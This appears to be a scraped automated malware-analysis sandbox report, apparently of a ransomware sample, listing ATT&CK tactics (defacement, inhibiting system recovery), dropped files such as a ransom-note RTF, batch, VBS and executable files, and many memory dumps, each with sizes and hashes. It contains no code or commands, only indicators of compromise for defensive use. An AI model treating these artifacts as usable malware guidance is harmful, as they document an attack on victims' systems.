Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf

Filesize
41KB

MD5
5f560d152e4c93c0747c2610aba1f5ee

SHA1
727888c99b19f55d368a01893ac601db0659abf7

SHA256
f9454d3a4a304921d63765b72b6aa0562a48fa96b54ab9ebc5fdccb64440623a

SHA512
c3df62ffd357ab03a6e6102f7cb3115458f548b7784392c07f3b04cbeb4a216f9e0f00b0a07bc2d1dda9374e719d82fcfcb88ab588ff1bdb05689edd484412ef

Download Submit
C:\Program Files\Google\Chrome\Application\#NOBAD_README#.rtf

Filesize
8KB

MD5
cf7dedd1cf561d01c897215971ef3f1c

SHA1
c2452b6606df79c9be76183539f82f28ad05008c

SHA256
e0287eeaab70e3b04625c64f989d8b05dd929bf66732c7873cab18fb1e04d623

SHA512
dd318178af9d626364f906eaf55a6d1218a7735832a460e019c9d0cb5dff4e2081d1e728b07aabaa2ce4c45fdebf6c09d2b4a491efce22cd8bcb585de1d90fe5

Download Submit
C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat

Filesize
226B

MD5
69437915fd976dc741aa2bc49acd947e

SHA1
2498f169c1868214184e61cec8f2278920249aae

SHA256
5bdffcafd3e5171b9f75466e36a1a103c9ecc4dccbcc382daea1b4bf066a7f1d

SHA512
8b74b070ac62d246aeba33bce287fcff1d9b2370146b501de28d2381abc9d6999a4368ee9b50169427fbd4cbd43874eaa826a8a5b6ea1e41fa32ebeaba60f053

Download Submit
C:\Users\Admin\AppData\Local\Temp\bad_3327BD6FB3D94447.txt

Filesize
4KB

MD5
c1d68df59c52995a2c521a8ca6ab3d91

SHA1
77348077e1b2edd2cf177efc37871ae4c4d23f3e

SHA256
83dbc077043f543e74f5652a3f8cf5b363716c29372650755eb623729c57385a

SHA512
5132f1f1260dceec05984ae4f801f03d59ea21c08fb118bda7c419b905e4fcb85d450e63d8347dbf9315b36ff1ae4cc5b30b0762648e58e821a2878a7e1747b1

Download Submit
C:\Users\Admin\AppData\Local\Temp\elog_3327BD6FB3D94447.txt

Filesize
9KB

MD5
e0706365058a86640ec025c490f0ddc4

SHA1
a505b3482dce233904d4393af345279a8f0b03d5

SHA256
7e6306c6a95ee68398d8e129f6035ad5ffbb969e243ccecb9f840c78e04cd113

SHA512
92832824db11e4d3c6090798b9e19338f6fc174a56f51efa3c028787e16cb715e0fd370f3282f455c1d9c57b52c0ea95e185e25c57296c11faf17d6a83af15a0

Download Submit
C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe

Filesize
181KB

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\mVSen3Ss64.exe

Filesize
221KB

MD5
3026bc2448763d5a9862d864b97288ff

SHA1
7d93a18713ece2e7b93e453739ffd7ad0c646e9e

SHA256
7adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec

SHA512
d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6

Download Submit
C:\Users\Admin\AppData\Roaming\8KUycya9.vbs

Filesize
260B

MD5
380d1111e2f6bbde5b0a90b4be9e1b1a

SHA1
10f5a799b910746590e93b33f21eb6c56930b5e6

SHA256
7f31d54a1d45ad2a5502bb4a6bbc1a561902c473330702edbfcfbc63a40b56ee

SHA512
f1cf0a92e525d941b62ae01e96aab402f456b9ccaa5284436e46776ae60328cf27b97cbb78c6722c5691bd83f6409679fad4bcae4d87df9651c05265e21958b9

Download Submit
C:\Users\Admin\AppData\Roaming\WUm6JQop.bat

Filesize
265B

MD5
043782f44b52c5de3432adb2e34ebd15

SHA1
53da85b491f4fd8b30b6dc8d510a242b678ad949

SHA256
2fa0350b0b0947111f3fda627b9a79e2b910042df96383f68c841b9eb6be6e8f

SHA512
57169c56297b47db2420cf715de58649a009ed12c8e2ab94fe25812efc2c49b2afd158a375b78a0bfc387a23d2b83711d8331fc756748f9b38c31e7e8c5c2b61

Download Submit
\Users\Admin\AppData\Local\Temp\NWPbIiay.exe

Filesize
3.7MB

MD5
9c7e90d7637277bb4f4985405eb0ace9

SHA1
5b0899d790eb4a37260e5d9b8a2ad3f2ada55b1d

SHA256
335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf

SHA512
7b57021edfa1108558c2d02df0600de55fd9338dfebc044c03dc677072975acc216a0374cff270d9d75f20e5b92b252f75b2ad3b94f603e7a09f69c14ca888d9

Download Submit
memory/588-7424-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/588-7408-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/752-7438-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/836-5590-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/900-7416-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1012-7413-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1016-2696-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1020-3385-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1044-7519-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1064-7451-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1152-7478-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1156-7399-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1196-7435-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1196-7434-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1220-2588-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1328-2557-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1332-7415-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1340-7448-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1400-3314-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1400-3437-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1620-3376-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1624-5824-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1632-3379-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1636-3388-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1636-3392-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1676-2560-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1760-7441-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1792-7390-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1864-3133-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1864-3132-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1892-7521-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1896-2945-0x0000000000190000-0x0000000000207000-memory.dmp

Filesize
476KB

Download
memory/1896-2192-0x0000000000190000-0x0000000000207000-memory.dmp

Filesize
476KB

Download
memory/1928-7497-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2012-4906-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2056-3439-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2056-3438-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2084-7483-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2092-7495-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2104-7414-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2128-7525-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2136-7489-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2172-2227-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2172-3130-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2212-7460-0x0000000000120000-0x0000000000197000-memory.dmp

Filesize
476KB

Download
memory/2216-5341-0x00000000002D0000-0x0000000000347000-memory.dmp

Filesize
476KB

Download
memory/2256-7508-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2288-3008-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2288-2979-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2296-0-0x0000000000400000-0x0000000000A78000-memory.dmp

Filesize
6.5MB

Download
memory/2328-7485-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2376-7417-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2384-3242-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2420-7513-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2440-7437-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2508-2942-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2508-2943-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2524-7398-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2580-3318-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2608-10-0x0000000000400000-0x0000000000A78000-memory.dmp

Filesize
6.5MB

Download
memory/2632-6359-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2640-4854-0x0000000001F70000-0x0000000001FE7000-memory.dmp

Filesize
476KB

Download
memory/2644-7440-0x00000000001E0000-0x0000000000257000-memory.dmp

Filesize
476KB

Download
memory/2644-2847-0x0000000001F50000-0x0000000001FC7000-memory.dmp

Filesize
476KB

Download
memory/2688-7487-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2732-5794-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2748-7459-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2796-7453-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2796-7452-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2816-7480-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2852-3382-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2948-7446-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2984-7447-0x0000000000330000-0x00000000003A7000-memory.dmp

Filesize
476KB

Download
memory/3000-6362-0x0000000000350000-0x00000000003C7000-memory.dmp

Filesize
476KB

Download
memory/3028-5955-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3040-5909-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3048-5952-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3056-3311-0x0000000000290000-0x0000000000307000-memory.dmp

Filesize
476KB

Download
memory/3064-7533-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3148-7493-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3176-7393-0x0000000000450000-0x00000000004C7000-memory.dmp

Filesize
476KB

Download
memory/3184-7407-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3212-7401-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3236-7405-0x0000000000470000-0x00000000004E7000-memory.dmp

Filesize
476KB

Download
memory/3276-6504-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3276-6425-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3276-7402-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3280-7531-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3280-7517-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3284-7528-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3312-7409-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3348-7523-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3404-7422-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3436-7423-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3524-7426-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3564-7433-0x0000000000430000-0x00000000004A7000-memory.dmp

Filesize
476KB

Download
memory/3568-7428-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3572-7515-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3588-7432-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3640-7465-0x0000000000130000-0x00000000001A7000-memory.dmp

Filesize
476KB

Download
memory/3668-7442-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3668-7443-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3672-7461-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3676-7466-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3676-7467-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3756-7511-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3776-7464-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3804-7472-0x0000000000130000-0x00000000001A7000-memory.dmp

Filesize
476KB

Download
memory/3900-7474-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3932-7475-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3952-6160-0x00000000002A0000-0x0000000000317000-memory.dmp

Filesize
476KB

Download
memory/3996-7499-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/4020-7404-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/4068-7395-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/4072-7506-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download